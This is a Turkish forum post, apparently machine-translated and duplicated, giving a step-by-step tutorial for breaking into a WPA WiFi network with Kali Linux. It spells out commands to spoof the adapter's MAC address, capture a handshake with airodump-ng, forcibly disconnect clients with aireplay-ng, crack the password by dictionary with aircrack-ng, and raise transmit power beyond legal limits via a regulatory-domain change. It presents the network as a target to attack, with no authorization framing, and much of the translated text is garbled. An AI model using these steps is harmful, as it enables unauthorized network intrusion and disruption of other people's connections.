Gerekenler:
1) İzleme moduna aktarabilen WiFi adaptörü.
2) Aircrack-ng kurulumu veya hazır bir Eksen almak, Kali Linux kullanacağız.
3) Biraz zaman ve müşteri noktaya bağlı.
Gidelim:
1) Kali Linux'u VMWare'de başlatın ve WiFi adaptörümüzü buna bağlayın.
Spoyler: Görüntü
2) Terminale gidin ve adaptörün komutla bağlanıp bağlanmadığını kontrol edin:
Kod:
Spoyler: Görüntü
3) Saldırıdan önce adaptörün MAC adresini değiştirmek ve ayrıca izleme moduna geçirmek gereklidir: ,
Kod:
5) Kanalı ve kanalını (CH) kaydetme hedefine karar verdikten sonra, izlemeyi durdurmak için Ctrl + C tuşlarına basın.
6) * .CAP dosyasını kaydetmek için geçici bir dizin oluşturun; bu, daha fazla arama yapmak için aşağıya düşer (el sıkışması).
kod:
Kod:
7) Tekrar çalıştırın, bir noktaya gelin ve bir dosyaya yazın.
Kod:-
8) airodump belli bir noktaya ve kanalına gönderildikten sonra, ona bağlı kullanıcıları göreceğiz, burada 2 seçenek var: kullanıcı noktaya bağlanıncaya kadar bekleyin veya tekrar bağlamak için kullanıcıları zorla keser.
9) Müşterinin bağlantısını kesmek için kullanacağız: aireplay-ng
Kod:
9.2) (-0) –deaktivasyon, 5 - deneme sayısı.-
10) tüm başarılı ve müşteri kesin ve tekrar biz önünü el sıkışma bağlayıp airodump yazıt :. Handshake çalışan pencerede görmek için ise ** ** ** ** ** ** sonra .... Ctrl + C tuşlarına basın ve aramayı yapın.
11) Bu örnekte kırmak için standart yardımcı programı kullanacağım: aircrack-ng
Kod:
12) Enter tuşuna bastıktan sonra aramanın ilerleyişini göreceğiz.
13) Eğer şifre sözlükte bulunursa, KEY FOUND! : [password]
Konu saldırıya uğradı, ağa bağlanabilir ve saldırabiliriz.
Not: Bu varyasyonda, yineleme için Aircrack-ng kullanıldı, ancak iyi bir NVidia veya ATI ekran kartınız varsa, yinelemek için Pyrit yardımcı programını kullanabilirsiniz; Pyrit veritabanında 1.000.000 ~ PMK / sn için kullandığı bir veri tabanı var.
Söylemeyi unuttum, başlangıç wlan0'ı kullanmamak daha iyidir, çünkü bu arayüz kartın gerçek MAC adresini bağlar ve değişmez !!!
Ayrıca, 0.5W veya 1W amplifikatöre sahip Rusya WiFi adaptörü için gelişmiş ve yasak bir varsa, aşağıdaki komutları girerek bu kazancı etkinleştirebilirsiniz:
Kod:
Videolu anlatım
1) İzleme moduna aktarabilen WiFi adaptörü.
2) Aircrack-ng kurulumu veya hazır bir Eksen almak, Kali Linux kullanacağız.
3) Biraz zaman ve müşteri noktaya bağlı.
Gidelim:
1) Kali Linux'u VMWare'de başlatın ve WiFi adaptörümüzü buna bağlayın.
Spoyler: Görüntü
2) Terminale gidin ve adaptörün komutla bağlanıp bağlanmadığını kontrol edin:
Kod:
Kod:
ifconfig wlan0
Spoyler: Görüntü
3) Saldırıdan önce adaptörün MAC adresini değiştirmek ve ayrıca izleme moduna geçirmek gereklidir: ,
Kod:
Kod:
3.1) ifconfig wlan0 down 3.2) macchanger -r wlan0 3.3) iwconfig wlan0 mode monitor 3.4) ifconfog wlan0 up
5) Kanalı ve kanalını (CH) kaydetme hedefine karar verdikten sonra, izlemeyi durdurmak için Ctrl + C tuşlarına basın.
6) * .CAP dosyasını kaydetmek için geçici bir dizin oluşturun; bu, daha fazla arama yapmak için aşağıya düşer (el sıkışması).
kod:
Kod:
Kod:
6.1) mkdir /tmp/wifi
Kod:
Kod:
7) Tekrar çalıştırın, bir noktaya gelin ve bir dosyaya yazın.
Kod:-
Kod:
7.1) airodump-ng –bssid {bssid_точки} –channel {CH} -w /tmp/wifi/to4ka wlan0
8) airodump belli bir noktaya ve kanalına gönderildikten sonra, ona bağlı kullanıcıları göreceğiz, burada 2 seçenek var: kullanıcı noktaya bağlanıncaya kadar bekleyin veya tekrar bağlamak için kullanıcıları zorla keser.
9) Müşterinin bağlantısını kesmek için kullanacağız: aireplay-ng
Kod:
Kod:
9.1) aireplay-ng -0 5 -a {BSSID_To4ka} -c {BSSID_Client} wlan0
9.2) (-0) –deaktivasyon, 5 - deneme sayısı.-
10) tüm başarılı ve müşteri kesin ve tekrar biz önünü el sıkışma bağlayıp airodump yazıt :. Handshake çalışan pencerede görmek için ise ** ** ** ** ** ** sonra .... Ctrl + C tuşlarına basın ve aramayı yapın.
11) Bu örnekte kırmak için standart yardımcı programı kullanacağım: aircrack-ng
Kod:
Kod:
11.1) aircrack-ng / tmp/wifi/ to4ka.cap -w /wifi/dic/9mil.dic -b **. **. **. **. **. ** 11.2) (/ tmp / wifi / to4ka.cap) ele geçirilen el sıkışma dosyası, (-w) şifreli sözlüğe giden yol, (-b) - BSSID puanları. [SPOILER="Görüntü"][ATTACH=full]1073[/ATTACH][/SPOILER]
12) Enter tuşuna bastıktan sonra aramanın ilerleyişini göreceğiz.
13) Eğer şifre sözlükte bulunursa, KEY FOUND! : [password]
Konu saldırıya uğradı, ağa bağlanabilir ve saldırabiliriz.
Not: Bu varyasyonda, yineleme için Aircrack-ng kullanıldı, ancak iyi bir NVidia veya ATI ekran kartınız varsa, yinelemek için Pyrit yardımcı programını kullanabilirsiniz; Pyrit veritabanında 1.000.000 ~ PMK / sn için kullandığı bir veri tabanı var.
Söylemeyi unuttum, başlangıç wlan0'ı kullanmamak daha iyidir, çünkü bu arayüz kartın gerçek MAC adresini bağlar ve değişmez !!!
Ayrıca, 0.5W veya 1W amplifikatöre sahip Rusya WiFi adaptörü için gelişmiş ve yasak bir varsa, aşağıdaki komutları girerek bu kazancı etkinleştirebilirsiniz:
Kod:
Kod:
1) ifconfig wlan0 down 2) macchanger -r wlan0 3) iw reg set BO 4) iwconfig wlan0 txpower 30 (1W), 27 (0.5W). 5) iwconfig wlan0 mode monitor 6) ifconfog wlan0 up
Videolu anlatım
Moderatör tarafında düzenlendi:

